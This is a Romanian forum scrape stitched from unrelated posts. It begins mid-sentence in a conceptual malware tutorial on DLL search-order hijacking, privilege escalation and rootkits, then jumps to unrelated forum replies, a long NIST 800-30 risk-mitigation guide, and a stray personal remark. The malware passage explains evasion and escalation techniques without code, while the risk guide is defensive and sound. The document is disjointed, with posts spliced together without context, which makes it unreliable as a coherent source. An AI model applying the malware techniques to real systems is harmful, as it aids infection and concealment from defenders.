in directorul „/Windows”, el va fi incarcat in locul celui legitim. DLL-ul malitios poate mai apoi incarca DLL-ul real pentru a da impresia ca nimic nu s-a intamplat! Asadar orice binar de startup care nu este gasit in „/System32” este vulnerabil la acest atac. Numai „explorer.exe” are aproximativ 50 de DLL-uri vulnerabile. 5. Escaladarea privilegiilor Cei mai multi utilizatori au drepturi de administratori locali, ceea ce inseamna vesti bune pentru autorii de malware. Mai exact asta inseamna ca ca utilizatorul care are drepturi de administrator pe calculator poate da aplicatiilor malware aceleasi privilegii. Comunitatile preocupate de securitatea IT recomanda sa nu se utilizeze utilizatori cu drepturi de administrator, asfel incat daca accidental calculatorul a fost infectat cu un malware, acesta sa nu aiba automat drepturi de administrator asupra sistemului. Daca utilizatorul nu are drept de administrator, malware-ul trebuie sa efectueze un atac de escaladare a privilegiilor pentru a castiga acces total. Majoritatea atacurilor de escaladare a privilegiilor sunt exploituri cunoscute sau atacuri zero-day contra sistemului de operare local, multe din ele putand fi gasite in Framework-ul Metasploit. Chiar si deturnarea ordinii de incarcare a unui DLL,discutat mai sus, poate fi utilizat pentru escaladarea privilegiilor. Daca directorul in care DLL-ul malitios este localizat poate fi scris de utilizator si procesul care incarca DLL-ul este rulat cu un nivel mai mare de privilegii, atunci DLL-ul malitios va obtine escaladarea privilegiilor. Malware care sa includa escaladarea privilegiilor este relativ rar intalnit. 6. Acoperirea urmelor -> User-Mode Rootkits Adesea se depun eforturi considerbile ca aplicatiile malware sa aiba procesele si pesistenta cat mai ascunsa(atat ca si nod de rulare cat si ca perioada pana la descoperire) Cea mai comuna unealta utilizata sa se ascunda activitatea malitioasa este denumita ca rootkit. Rootkit-urile pot avea multe forme dar cele mai multe functioneaza prin modificarea functionalitatii interne a sistemului de operare. Aceste modificari fac ca fisiere, procese, conexiuni sau alte resurse sa fie invizibile altor programe, care inlesnesc descoperirea activitatii malitioase de catre produse antivirus, administratori sau analisti de securitate. Anumite rootkituri modifica aplicatiile care utilizeaza spatiul utilizatorului dar majoritatea modifica direct kernelul, din moment ce mecanismele de protectie ca IPS-urile (intrusion prevention systems) sunt instalate si ruleaza la nivelul kernelului. ! Atat rootkiturile cat si mecanismele defensive sunt mult mai eficiente cand ruleaza la nivelul kernelului(Kernel-mode rootkits -> cel mai des intalnite).

// le : le-am dat, oferta expirata. Bafta.

Asta ar intra mai degraba la categoria stiri. Nu poti sa dai un link catre o pagina cu 3 vorbe si o imagine si gata, asta e tutorialul.

Daca in https://rstforums.com/forum/82664-notiuni-de-information-risk-managementt-evaluarea-riscului.rst am evaluat riscul IT si am descoperit amenintarile, in urmatoarele randuri puteti gasi cateva informatii despre atenuarea riscurilor identificate. Sursa de baza: standardul NIST 800-30 Information Risk Management – Risk mitigation ======================================================= Atenuarea riscului/ Risk mitigation Cuprins: DEFINITII SI INTRODUCERE 1. OPTIUNI DE ATENUARE A RISCULUI 2. STRATEGIE DE ATENUARE A RISCULUI 3. ABORDARE PENTRU IMPLEMENTAREA CONTROLULUI Pas 1. Prioritizarea actiunilor Pas 2. Evaluarea optiunilor de controale recomandate Pas 3. Efectuarea analizei cost-beneficiu Pas 4. Selectarea contrololui Pas 5. Atribuirea responsabilitatilor Pas 6. Dezvoltarea unui plan de implementare a protectiei Pas 7. Implementarea controalelor selectate 4. CATEGORII DE CONTROALE 4.1. CONTROALE DE SECURITATE TEHNICE 4.1.1. : Controale tehnice pentru suport 4.1.2 : Controale tehnice preventive 4.1.3 : Controale tehnice de detectie si recuperare 4.2. CONTROALE DE SECURITATE DE MANAGEMENT(MANAGEMENT SECURITY CONTROLS) 4.2.1. Controale de management preventive 4.2.2. Controale de management detective 4.2.3. Controale de management de restaurare 4.3. CONTROALE OPERATIONALE 4.3.1. Controale operationale preventive 4.3.2. Controale operationale detectie 5. ANALIZA COST-BENEFICIU EXEMPLU DE ANALIZA COST-BENEFICIU 6. RISCUL REZIDUAL Definitii si introducere Definitie: Evaluarea riscului/Risk assesment - Procesul de identificare a riscurilor securitatii unui sistem si determinarea probabilitatii aparitiei lor, a impactului rezultat si a masurilor de protectie aditionale care vor atenua acest impact. Parte a Risk Management si sinonim cu Risk Analysis/Analiza riscului Definitie: Gestionarea riscului/ Risk Management - Intregul proces de identificare, controlare si atenuare a riscurilor legate de sisteme informationale. Include evaluarea riscului, analiza cost-beneficiu si selectarea, implementarea, testarea si evaluarea masurilor de protectie din punct de vedere al securitatii. Aceasta revizuire a securitatii generale a sistemului ia in considerare atat eficacitatea cat si eficienta, incluzand impactul asupra organizatiei si constrangerile impuse de politici, regulamente si legislatia in vigoare. Definitie: Amenintare/Threat - Potentialul pentru o amenintare-sursa de a se exercita(concretiza) – fie declansata accidental fie exploatata intentionat, printr-o vulnerabilitate specifica. Definitie: Amenintare sursa/Threat-source - Este fie (1) o situatie si o metoda utilizata la exploatarea intentionata a unei vulnerabilitati sau (2) o situatie si o metoda ce poate declansa accidental vulnerabilitatea. Definitie: Vulnerabilitate - Este un defect sau o slabiciune in procedurile, design-ul, implementarea sau controalele interne aferente securitatii unui sistem, ce poate fi exercitat(declansat accidental sau exploatat intentionat) si care poate avea ca rezultat o bresa de securitate sau o violare a politicilor de securitate a sistemului. Definitie: Control (Controale) – Este o masura, o actiune, o prevedere, o specificatie, o impunere cu rolul de a ghida beneficiarul in atingerea si mentinerea unui grad de securitate planificat. 1. Optiuni de atenuare a riscului ============================================================ Atenuarea riscului este o metodologie systematica utilizata de conducere pentru a reduce riscul misiunii. Atenuarea riscului poate fi atinsa prin urmatoarele optiuni : --> Asumarea riscului : optiunea de a accepta potentialul risc si de a continua sa foloseasca sistemul sau de a implementa controale pentru a micsora riscul la un nivel acceptabil; --> Evitarea riscului : optiunea de evitare a riscului prin eliminarea cauzei riscului si/sau a consecintelor; --> Limitarea riscului : optiunea de limitare a riscului prin implementarea controalelor ce minimizeaza impactul advers al exercitarii unei amenintari-sursa printr-o vulnerabilitate; --> Planificarea riscului - optiunea de a gestiona riscul prin dezvoltarea unui plan ce prioritizeaza, implementeaza si mentine controalele; --> Cercetare si confirmare - optiunea de a diminua riscul de a inregistra pierderi prin confirmarea vulnerabilitatilor sau a defectelor si cercetarea pentru descoperirea controalelor necesare corectarii vulnerabilitatii; --> Transferarea riscului - optiunea de a transfera riscul unei entitati externe sau utilizand optiuni de compensare a pierderii cum ar fi incheierea unei asigurari. Cand se alege una din optiunile de mai sus trebuie sa se tina cont si de scopul si misiunea organizatiei! Se poate sa nu fie practica abordarea tuturor riscurilor identificate si astfel sa se dea prioritate perechilor de amenintari si vulnerabilitati ce au potentialul de a cauza impact sau daune semnificante. 2. Strategie de atenuare a riscului ============================================================== Conducerea si/sau proprietarii misiunii/businesului, stiind de potentialele riscuri si controalele recomandate pot intreba : "Cand si in ce imprejurari ar trebui sa actionez? Cand ar trebui sa implementez aceste controale pentru a atenua riscul si a proteja organizatia?" Un exemplu de strategie, care furnizeaza ghidarea actiunilor de atenuare a riscului in cazul unei amenintari umane intentionate: --> Cand exista vulnerabilitate (sau defect sau slabiciune) : se implementeaza tehnici de asigure care sa reduca probabilitatea ca vulnerabilitatea se va exercita; --> Cand o vulnerabilitate poate fi exercitata : se aplica protectie pe nivele, schite arhitecturale si controale administrative pentru a minimiza sau preveni aparitia vulnerabilitatii; --> Cand costurile unui atacator sunt mai mici decat potentialele castiguri : se aplica metode de protectie prin care sa se scada motivatia atacatorului prin cresterea costurilor sale; --> Cand pierderile sunt prea mari : aplica principii de design, design-uri/schite arhitecturale si protectii tehnice si nontehnice pentru a limita extinderea atacului, reducand astfel potentialele pierderi. Strategia de mai sus, ce exceptia celui de-al 3-lea item se aplica si la atenuarea riscurilor ce provin din amenintari de mediu sau amenintari umane neintentionate. 3. Abordare pentru implementarea controlului ============================================================== Cand este necesar sa se intrprinda actiuni de control, se aplica urmatoarea regula : --> Gaseste cele mai mari riscuri si lupta pentru atenuarea lor cu cel mai mic cost si cu un impact minim asupra celorlalte capabilitati ale misiunii organzatiei. Urmatoarea metodologie de atenuare a riscului descrie abordarea implementarii controlului. Pas 1. Prioritizarea actiunilor Bazata pe sistemele de risc prezentate in raportul de evaluare a riscului, actiunile de implementare sunt prioritizate. La alocarea resurselor, prioritatea de top ar trebui data itemilor de risc cu rankinguri ale riscurilor inacceptabil de mari. Aceste perechi vulnerabilitate/amenintare wor necesita actiuni corective imediate pentru a proteja misiunea si interesul organizatiei. REZULTAT PAS 1. : RANKINGUL ACTIUNILOR DE LA MARE LA MIC Pas 2. Evaluarea optiunilor de controale recomandate Controalele recomandate in procesul de evaluare a riscului e posibil sa nu fie cele mai potrivite si fezabile optiuni pentru o organizatie si un sistem specific. In acest pas, fezabilitatea (ex : compatibilitatea, acceptanta din partea utilizatorilor) si efectivitatea optiunilor controalelor recomandate sunt analizate. Obiectivul este selectarea celor mai potrivite optiuni de control pentru minimizarea riscului. REZULTAT PAS 2. : LISTA CU CONTROALE FEZABILE Pas 3. Efectuarea analizei cost-beneficiu Pentru a ajuta conducerea in a decide si pentru a identifica controalele cost-effective (eficiente ca si cost) este efectuata o analiza cost-beneficii. REZULTAT PAS 3. : ANALIZA COST-BENEFICIU CE DESCRIE COSTURILE SI BENEFICIILE IMPLEMENTARII SI NEIMPLEMENTARII CONTROALELOR. Pas 4. Selectarea contrololui Pe baza rezultatelor analizei cost-beneficiu, conducerea determina cel/cele mai rentabile din punct de vedere cost-efect controale pentru reducerea riscului misiunii organizatiei.Controalele selectate trebuie sa combine elemente de control tehnic, operational, de conducere pentru a asigura o securitate adecvata pentru sistemul IT si organizatie. REZULAT PAS 4. : SELECTAREA CONTROALELOR. Pas 5. Atribuirea responsabilitatilor Persoanele potrivite (persoane din cadrul organizatiei sau persoane externe, angajate special) ce au expertiza si abilitatile potrivite pentru implementarea controalelor selectate vor fi identificate si li se vor atribui responsabilitati. REZULTAT PAS 5. : LISTA PERSOANELOR RESPONSABILE Pas 6. Dezvoltarea unui plan de implementare a protectiei In timpul acestui pas se dezvolta un plan de implementarea a protectiei. plnul trebuie sa contina cel putin urmatoarele informatii: --> riscuri (perechi vulnerabilitate/amenintare) si nivele de riscuri asociate (rezultatul de la raportul de evaluare a riscului) --> controale recomandate (rezultat din raportul de evaluare a riscului) --> actiuni prioritizate (prioritari fiind itemii care au risc mare si foarte mare) --> controale planificate selectate --> resursele necesare implementarii controalelor planificate --> lista angajatilor si echipelor responsabile --> data de inceput a implementarii --> data tinta de finalizare a implementarii --> cerinte de mentenanta Planul de implementare a protectiei/pazei prioritizeaza actiunile de implementat si stabileste data de start si cea de finalizare a proiectului. Acest plan va ajuta si va accelera procesul de atenuare a riscului. REZULTAT PAS 6. : PLAN DE IMPLEMENTARE A PROTECTIEI Pas 7. Implementarea controalelor selectate In functie de fiecare situatie in parte controalele implementate pot micsora nivelul riscului dar nu il pot elimina ramanand astfel un risc REZIDUAL. REZULTAT PAS 7. : RISC REZIDUAL. 4. Categorii de controale =============================================================== Pentru maximizarea eficacitatii controalelor recomandate intr-o organizatie in scopul atenuarii riscului este necesar ca organizatia sa ia in considerare controale de securitate tehnice, de management si operationale sau in orice combinatie. Controalele de securitate utilizate intr-un mod potrivit pot preveni, limita sau impiedica pagubele amenintarilor-sursa asupra misiunii organizatiei. Procesul de recomandare a controalelor va include alegerea unei combinatii potrivite de controale tehnice, de management si operationale care sa asigure imbunatatirea securitatii organizatiei. 4.1. Controale de securitate tehnice Aceste controale pentru atenuarea riscului pot fi configurate sa protejeze impotriva unor tipuri de amenintari date. Aceste controale pot varia de la masuri simple la masuri complexe si implica de obicei arhitecturi de sistem, discipline de engineering si pachete de securitate formate dintr-un mix de hardware, software si firmware.Toate aceste masuri ar trebui sa conlucreze pentru a securiza datele critice si sensibile, informatiile si functiile sistemului. Controalele tehnice pot fi grupate astfel (dupa scopul primar) --> controale de suport : sunt generice si stau la baza celor mai multe capabilitati de securitate IT. Aceste controale trebuie sa existe deja, pentru a putea fi implementate alte controale. --> controale preventive : de concentreaza pe prevenirea breselor de securitate --> controale de detectare si recuperare : se concentreaza pe detectarea breselor de securitate si recuperarea dupa acestea. 4.1.1. : Controale tehnice pentru suport Prin natura lor, controalele tehnice de suport sunt universale si corelate cu multe alte controale. Controalele tehnice de suport sunt: --> Identificarea. Acest control furnizeaza abilitatea de a identifica in mod unic utilizatorii,procesele si resursele informatiilor. Pentru a implementa alte controale de securitate (ex : controlul accesului discretionar -DAC, controlul accesului obligatoriu -MAC, etc) este esential ca atat subiectii cat si obiectele sa fie identificabili. --> Managementul cheilor criptografice. Cheile criptografice trrebuie sa fie gestionate intr-un mod securizat atunci cand se implementeaza functii criptografice in oricare alte controale. Managementul cheilor criptografice include generarea, distribuirea, stocarea si mentenanta cheilor. --> Administrarea securitatii. Caracteristicile de securitate ale unui sistem IT trebuie sa fie configurate (ex : activate sau dezactivate) pentru a indeplinii nevoia unei instalari specifice si pentru a contabiliza schimbarile in mediul operational. Sistemul de securitate poate fi construit in securitatea sistemului de operre sau a aplicatiei. Exista addon-uri de securitate comerciale, ce trebuie doar utilizate. --> Protectia sistemului. Cateva exemple : protectia informatiei reziduale(sau "object reuse"), separarea proceslor, modularitatea, impartirea pe niveluri,etc. 4.1.2 : Controale tehnice preventive Aceste controale , ce pot inhiba incercarile de violare a politicilor de scuritate, includ : --> Autentificarea. Acest control furnizeaza intelesul verificarii identitatii unui subiect pentru a ne asigura ca identitatea pe care sustine ca o are este valida. Mecanismele de autentificare includ parole, PIN-uri si alte tehnologii emergente (token,smart card, kerberos, certificate digitale..) --> Autorizarea. Permite specificarea si managementul ulterior al actiunilor permise pentru un anumit sistem. --> Punerea in practica a controlului accesului. Integritatea si confidentialitatea datelor este pusa in aplicare prin controlul accesului. Cand un subiect care cere acces a fost autorizat sa acceseze anumite procese este necesar sa se puna in aplicare politica de securitate definita (MAC - mandatory acces control sau DAC- discretionary acces conntrol). Aceste controale bazate pe politici sunt puse in aplicare prin mecanisme de control al accesului distribuite in tot sistemul (e : etichete de senzitivitate MAC; seturi de permisiuni ale documentelor DAC, ACL-uri, roluri, etc) Eficacitatea si puterea controlului accesului depinde de corectitudinea diciziilor de control al accesului(ex : cum sunt configurate regulile de securitate) si de puterea controlului accesului aplicat (designul securitatii hardware sau software) --> Non-repudierea. Contabilizarea sistemului depinde de abilitatea de a asigura ca cei care trimit nu pot nega trimiterea informatiei iar cei care primesc nu pot nega primirea ei. Non-repudierea acopera atat preventia cat si detectia. A fost inclus in categoria de preventie in acest ghid deoarece mecanismele implementate previn repudierea cu succes a unei actiuni(ex: certificatul digital ce contine cheia privata a detinatorului, stiuta doar de el). --> Comunicatii protejate. Intr-un sistem distribuit, abilitatea de a indeplini obiectivele de securitate este dependenta de siguranta comunicatiilor. Controlul protejarii comunicatiilor ne asugura de integritatea, disponibilitatea si confidentialitatea informatiei critice si sensibile cand aceasta este in tranzit. Comuncatiile protejate utilizeaza metode de criptare (virtual private network - VPN; IPsec ) si desfasurarea tehnologiilor criptografice (DES, Triple DES, RAS, etc) cu scopul minimizarii amenintarilor din retea cum sunt : interceptia, sniffing-ul pachetelor, replay, wiretapping, eavesdropping. --> Intimitatea tranzactiei (transaction privacy). Atat sistemul sectorului privat cat si al guvernului necesita din ce in ce mai mult mentinerea intimitatii indivizilor. Controalele de mentinere a intimitatii tranzactiei (SSL - secure socket Layer, secure shell) protejeaza impotriva pierderii de intimitate , cu respect pentru tranzactiile efectuate de un individ. 4.1.3 : Controale tehnice de detectie si recuperare Controalele de detectie avertizeaza cu privire la violarile sau tentativele de violare ale politicilor de securitate si includ controale ca urmele auditului, mecanisme de detectie a intruziunii si valori de verificare -chesksums. Controalele de restaurare/revenire pot fi utilizate pentru a restabili resursele de calcul pierdute. Ele sunt necesare ca si complement la controalele de suport si preventive, pentru ca nici una din masuri nu este perfecta. Controalele de detectie si restaurare includ: --> Auditul. Auditarea evenimentelor relevante din punct de vedere al securitatii si monitorizarea si urmarirea anormalitatilor sistemului sunt elemente cheie in detectia de dupa si restaurarea di bresele de securitate. --> Detectia si izolarea intruziunii. Este esential sa se detecteze bresele de securitate(ex : patrundere in retea, activitati suspicioase) pentru a se putea raspunde in timp util. De asemenea este inutil sa se detecteze repee o bresa daca nu se poate rasounde eficient. Controlul detectiei intruziunii si a izolarii furnizeaza aceste doua capabilitati. --> Dovada integralitatii. Controlul devezii de deplinatate (integralitate - ex : tool de integritate a sistemului) analizeaza integritatea si neregulile sistemului si identifica expunerile si potentialele amenintari. Acest control nu previne violarea politici de securitate dar le detecteaza si ajuta la determinarea tipului de actiune corectiva necesara. --> Restabilirea unei stari sigure. Acest serviciu permite unui sistem sa se intoarca la o stare ce este recunoscuta ca fiind sigura(din punct de vedere al securitatii vorbind) dupa aparitia bresei de securitate. --> Detectarea si eradicarea virusilor. Softurile instalate pe servere si statii in scopul detectarii, identificarii si eliminarii virurilor software pentru a asigura integritatea sistemului si a datelor. 4.2. Controale de securitate de management(management security controls) Controalele de management, impreuna cu cele tehnice si operationale sunt implementate sa gestioneze si sa reduca riscurile de pierderi si sa protejeze misiunea unei organizatii. Controalele de management se concenttreaza pe dispozitiile politicilor, standardelor si indrumarilor pentru protectia informatiilor si care sunt efectuate prin procedurile operationale ale organizatiei. Controalele de management sunt : preventive, detective si de restaurare. 4.2.1. Controale de management preventive Acestea trebuie sa includa : --> atribuirea responsabilitati cu securitatea pentru a ne asigura ca se furnizeaza o securitate adecvata sistemelor IT critice; --> dezvoltarea si mentinerea planurilor de securitate a sistemului astfel incat sa fie documentate controalele curente si sa le descrie pe cele planificate; --> Punerea în aplicare a controalelor de securitate de personal, incluzand separarea sarcinilor, privilegii minimale (least privilege) si inregistratea si terminarea accesului utilizatorilor la calculatoare. --> Efectuarea de traininguri tehnice si de constientizare a securitatii care sa ne asigure ca utilizatorii finali si utilizatorii sistemului sunt constienti de regulile de comportament si de responsabilitatile pe care le au in protejarea misiunii organizatiei. 4.2.2. Controale de management detective Acestea trebuie sa includa : --> Punerea în aplicare a controalelor de securitate de personal, incluzand aici degajarea pesonalului, verificarea backgroundului personalului, rotatia sarcinilor; --> Efectuare de revizuri periodice a controalelor de securitate pentru a verifica eficacitatea acestora; --> Efectuarea de audituri periodice ale sistemului --> Efectuarea gesiunii riscului in mod continuu pentru a evalua si atenua riscul; --> Autorizarea sistemelor IT pentru a aborda si accepta riscul rezidual. 4.2.3. Controale de management de restaurare Acestea trebuie sa includa : --> Furnizarea continuitatii suportului si dezvoltarii, testarea, mentinerea continutatii planului de operatiuni de furnizat pentru reluarea afacerii si asigurarea continutatii activitatii/operatiunilor in timpul urgentelor sau a dezastrelor; --> Stabilirea unei capabilitati de raspuns la incident de pregatit, recunoasterea, raportarea si raspunsul la incident si readucerea sistemului IT intr-o stare operationala. 4.3. Controale operationale Standardele de securitate ale unei organizatii trebuie sa stabileasca un set de controale si indrumari pentru a asigura ca procedurile de securitate prevazute in organizatie sunt puse in aplicare in mod corect si sunt implementate conform scopului si misiunii organizatiei. Managementul joaca un rol vital in supravegherea implementarii politicii si in asigurarea stabilirii controalelor operationale potrivite. Controalele operationale, implementate impreuna cu un set de cerinte de baza (ex : controale tehnice) si in concordanta cu bunele practici ale industriei, sunt utilizate pentru a corecta deficientele operationale ce pot exploatate de potentiale vulnerabilitati-sursa. Pentru a se asigura consistenta si uniformitatea in securitatea operatiilor, procedurile pas-cu-pas si metodele de implementare a controalelor operationale trebuie sa fie definite clar si sa fie documentate si mentinute. 4.3.1. Controale operationale preventive Acestea trebuie sa includa : --> controlul si eliminarea accesului la date stocate pe diverse medii de stocare(ex : controlul accesului fizic la date); --> limitarea distribuirii externe a datelor (ex :utilizarea etichetarii); --> controlul virusilor software; --> protectia locatiei cu putere de calcul (computing facility - ex : paznici, proceduri pentru vizitatori, sistem de insigne electronice,acces control bazat pe biometrie, bariere si garduri, etc); --> dulapuri pentru securizarea firelor, echipamentelor,cablurilor; --> furnizarea capabilitatii de backup(ex : proceduri pentru backup regulat a datelor si sistemelor, loguri ce salveaza toate modificarile in bazele de date pentru utilizarea in diferite scenarii de recuerare, etc) --> stabilirea unor proceduri si a securitatii stocarii off-site; --> protejarea laptopurilor,calculatoarelpr personale, statiilor de lucru; --> protejarea bunurilor IT impotriva incendiilor(ex: cerinte si proceduri de utilizare a stingatoarelor, etc) --> furnizarea de surse de energie electrica pentru urgente (UPS - uninterruptible power supplies, generatoare on-site); --> controlul umiditatii si temperaturii locatiei cu putere de calcul (aer conditionat, dispersarea calduri, etc) 4.3.2. Controale operationale detectie Acestea trebuie sa includa : --> furnizarea securitatii fizice (ex : detectori de miscare, monitorizare CCTV, senzori si alarme) --> asigurarea securitatii mediului (ex : detectoare de fum/foc, senzori si alarme. 5. Analiza cost-beneficiu =========================================================== Pentru a aloca resurse si a implementa controale cost-effective, dupa identificarea tuturor controalelor posibile si evaluarea fezabilitatii si eficacitatii lor, organizatia sr trebui sa efectueze o analiza cost-beneficiu pentru fiecare control propus. Prin analiza cost-beneficiu se determina ce controale sunt necesare si potrivite in circumstantele utilizarii lor. Analiza cost-beneficiu poate fi calitativa sau cantitativa. Scopul ei este de a demonstra ca pretul/costul implementarii controalelor se justifica prin reducerea nivelului de risc. De exemplu, organizatia poate nu doreste sa cheltuie 1000 EUR pe un control pentru a reduce riscul de a pierde 200 EUR. O analiza cost-beneficiu pentru un nou control propus sau pentru imbunatatirea unui control existent cuprinde: --> determinarea impactului implementarii noului control sau a imbunatatirii celui existent; --> determinarea impactului ne-implementarii noului control sau a imbunatatirii celui existent; --> estimarea costului implementarii. Acesta poate include, fara a se limita la : : cumparare de hardware si software : reducerea eficacitatii operationale daca performanta sau functionalitatea sistemului este redusa din cauza cresterii securitatii; : costul implementarii procedurilor si politicilor aditionale : costul angajarii de personal aditional pentru implementarea serviciilor, politicilor, procedurilor propuse; : costurile cu trainningurile : costuri de mentenanta --> evaluarea costurilor si beneficiilor de implementare comparativ cu cat de critice/importante sunt datele sau sistemele, pentru a determina importanta pentru organizatie de a implementa noile controale, stiindu-se costurile si impactul lor. Organizatia trebuie sa evalueze beneficiile controalelor, si in functie de costurile implementarii si al neimplementarii lor sa determine daca este sau nu fezabil sa le implementeze. EXEMPLU DE ANALIZA COST-BENEFICIU Sa presupunem ca sistemul IT X stocheaza si proceseaza activitati critice si date sensibile privind informatii private ale angajatilor. Cu toate acestea, auditarea nu a fost activata/efectuata. O analiza cost-beneficiu este efectuata pentru a se determina daca este necesar ca si capabilitatea de audit sa fie activata pentru sistem. Itemii (1) si (2) se refera la impactul intangibil (ex : factori de descurajare) al implementarii sau ne-implementarii noului control. Itemul (3) afiseaza impacturile tangibile (ex : costul) (1) Impactul activarii capabilitatii de audit a sistemului : capabilitatea de audit a sistemului permite administratorului insarcinat cu securitatea sistemului sa montorizeze activitatile utilizatorilor sistemului dar va incetini performanta sistemului si astfel va fi afectata productivitatea utilizatorilor. De asemenea, implementarea necesta resurse aditionale asa cum sunt descrise la punctul (3) (2) Impactul ne-activarii capabilitatii de audit a sistemului : activitatile utilizatorilor si violarile+tentativele de violare nu pot fi montorizate si urmarite iar securitaea nu poate fi maximizata pentru a proteja datele confidentiale si misiunea organizatiei. (3) Estimarea costurilor cu activarea capabilitatii de audit a sistemului : - cost cu activarea capabilitatii de audit: 0 $ (nu exista,built-in) - cost cu angajati aditionali care sa faca auditul: xx,xxx $ - cost cu instriurea (trainning): x,xxx $ - cost cu un software add-on pentru raportari de audit: x,xxx $ - cost cu mentenanta datelor de audit (stocare, arhivare): x,xxx $ Cost total estimat : XX,XXX $ Conducerea, mnagementul organizatiei trebuie sa determine ce nivel al riscului este acceptabil pentru misiunea,scopul organizatiei. Impactul controlului poate fi evaluat iar controlul poate fi inclus sau exclus in functie de determinarea intervalului de fezabilitate ale nivelurilor de risc. Acest interval variaza in functie de organizatie, dar totusi se aplica urmatoarele reguli pentru a se determina utilizarea unui nou control: --> daca acel control va reduce riscul mai mult decat e nevoie, atunci se verifica daca exista o alternativa mai putin costisitoare; --> daca acel control va costa mai mult decat reducerea riscului pe care o furnizeaza, atunci se cauta altceva; --> daca acel control nu reduce riscul suficient, atunci se cauta mai multe controale sau un conttrol diferit; --> daca acel control furnizeaza o reducere a riscului suficienta si este eficient din punct de vedere al costului (cost-effective) atunci se utilizeaza. Cel mai adesea costul implementarii unui control este mai tangibil decat costul neimplementarii lui. Ca rezultat conducerea joaca un rol critic in deciziile cu privire la implementarea masurilor de control pentru protejarea misiunii organizatiei. 6. Riscul rezidual ========================================================= Organizatiile pot analiza gradul de reducere a riscului generat prin utilizarea de noi controale sau prin imbunatatirea unora existente, din punctul de vedere al reducerii probabilitatii amenintarii sau a impactului, cei doi parametrii ce definesc nivelul de atenuare a riscului. Implementarea de noi controale sau imbunatatirea celor existente poate atenua riscul prin : --> eliminarea unora dintre vulnerabilitatile (defecte si slabiciuni) sistemului, reducand astfel numarul de perechi posibile amenintari- sursa / vulnearbilitate; --> adaugarea unui control pentru a reduce capacitatea si motivarea unei amenintari-sursa. Spre exemplu, un departament determina ca, costul cu instalarea si mentenanta unui add-on software pentru un calculator de sine statator ce sticheaza fisiere sensibile nu este justificat, dar ar trebui implementate controale administrative si fizice pentru a face accesul la acel PC mai dificil (ex : punem PC-ul intr-o camera incuiata, a carei cheie este tinuta de manager) --> reducerea magnitudinii impactului advers (de exemplu : limitarea intinderii unei vulnerabilitati) Riscul ce ramane dupa implementarea sau imbunatatirea controalelor se numeste risc rezidual. Practic, nici un sistem IT nu este fara riscuri si nu toate controlele implementate pot elimina risculpe care au ca scop sa il combata sau sa il reduca la nivelul zero.

sunt multi programatori in viata ta? in general programatorii ar trebui sa aiba o logica dezvoltata, stiai? On : salut